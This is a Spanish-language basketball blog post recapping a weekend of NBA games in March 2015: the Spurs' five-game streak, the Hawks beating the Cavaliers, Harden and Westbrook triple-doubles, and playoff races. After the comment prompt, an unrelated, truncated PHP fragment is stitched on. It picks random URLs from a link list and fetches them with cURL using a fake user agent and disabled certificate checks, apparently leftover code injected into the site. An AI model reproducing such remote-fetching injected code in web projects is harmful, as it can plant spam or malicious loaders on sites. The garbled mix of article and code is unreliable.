Informe del fin de semana: Ya llegan los Spurs

09 de March de 2015 por TheDeerHunter

Tal vez más tarde que en los últimos años pero los Spurs parecen ya haber pillado el ritmo. 5 victorias seguidas y la 4ª posición a tiro. Se aceptan apuestas.

Pero empecemos por lo más destcacado del viernes: los Hawks frenaron la implacable progresión de LeBron James y sus Cavaliers sujetando a “The King” durante todo el partido y rematándolo en el último cuarto. A estas alturas de la temporada todo parece indicar que este enfrentamiento será la final de conferencia en el Este. Ningún otro equipo de su parte del cuadro tiene pinta de estar en condiciones de plantarles cara, en todo caso Chicago o Indiana si recuperan a tiempo a sus ilustres lesionados y según los cruces de turno. Casualmente tocó enfrentamiento directo entre ellos y se lo llevó Indiana, en un estado de forma extraordinario. Otro duelo directo de zona playoffs en el Este fue el Raptors@Hornets con victoria local a pesar de los 30 puntos de DeRozan. Crisis galopante de los canadienses a falta de recuperar el efecto Lowry. Por su parte, los Wizards vencieron por dos puntos a los Heat, y les expulsaron eventualmente de la zona noble.

En Houston quinto triple doble de James Harden esta campaña y victoria de los Rockets ante los Pistons con actuación discreta de Josh Smith ante sus ex, quienes suman 5 derrotas consecutivas. La victoria no les sirvió a los tejanos para recortar distancias pues los Warriors doblegaron a unos decepcionantes Mavs y los Grizzlies disputaron un encuentro relativamente cómodo ante Lakers. Otro equipo de playoffs, los Spurs, amarró su compromiso ante Denver y parece llegar al momento cumbre de la temporada en su mejor estado de forma. Por su parte los Suns, con una agónica victoria en la prórroga ante Brooklyn, se agarran con uñas y dientes a la hipótesis del milagro. Los Pelicans, sin embargo, tropezaron ante los Celtics con una nueva gran actuación de Thomas.

Terminando con la jornada del viernes, descomunal duelo entre Gay y Oladipo en la victoria de Orlando ante Sacramento y victoria también de los Jazz en Philadelphia.

El sábado los Rockets sí disfrutaron de una jornada particularmente propicia para sus intereses. Ganaron a Denver con otra gran actuación de Harden mientras que los Blazers cayeron en Minneapolis, a pesar del “mayor esfuerzo en vano” de Damian Lillard , que rozó el triple doble, y a los Grizzlies se les acabó la gasolina durante la segunda parte en New Orleans.

En el Este destacó la derrota de los Hawks en Philadelphia acusando en esta ocasión el descanso otorgado a Millsap, Korver y Carroll. En cambio, los Cavs superaron sin problemas a los Suns la noche en la que LeBron alcanzaba nada menos que a Mark Price como líder histórico de asistencias de la franquicia. Por su parte, los Pacers lograron en el Madison su 5ª victoria consecutiva para colocarse momentáneamente séptimos (desde el 4 de febrero llevan 11 victorias y sólo 2 derrotas) y los Heat lograban superar el partidazo de Cousins para recuperar plaza de playoffs. Los Bucks ganaron a Washington con 30 puntazos de Middleton y abren totalmente la lucha por la quinta posición.

Ayer domingo los Warriors se impusieron en casa a los Clippers a pesar de no contar con la mejor versión de Stephen Curry, y eso que el base se marcó un par de jugadas marca de la casa. Sus compañeros dieron el callo y la victoria no escapó de la bahía. En el Oeste victorias también de Mavericks (ante Lakers) y Spurs (ante Chicago), en el primer partido de Tim Duncan sin anotar un tiro de campo en toda su carrera. Ojito de todos modos con los de Popovich que llevan 5 victorias seguidas  y están a apenas 2 y media de la 4ª posición que ahora ocupan los Blazers. En la lucha por la 8ª plaza nueva victoria de los Thunder con el 5º triple-doble de Russell Westbrook en 6 partidos. Los Raptors le exigieron el máximo.

En el Este aparte de las ya comentadas derrotas de Bulls y Raptors que parecen dejar en bandeja de plata la 2ª posición de la conferencia a los Cavs, asistimos al capítulo diario de la lucha por la 8ª plaza. Ganaron los Hornets y perdieron Nets y Celtics lo que parece restringir la lucha por las 2 últimas posiciones de PO a 3 equipos: Hornets y Pacers, que están como un tiro y los Heat que se mantienen como buenamente pueden.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>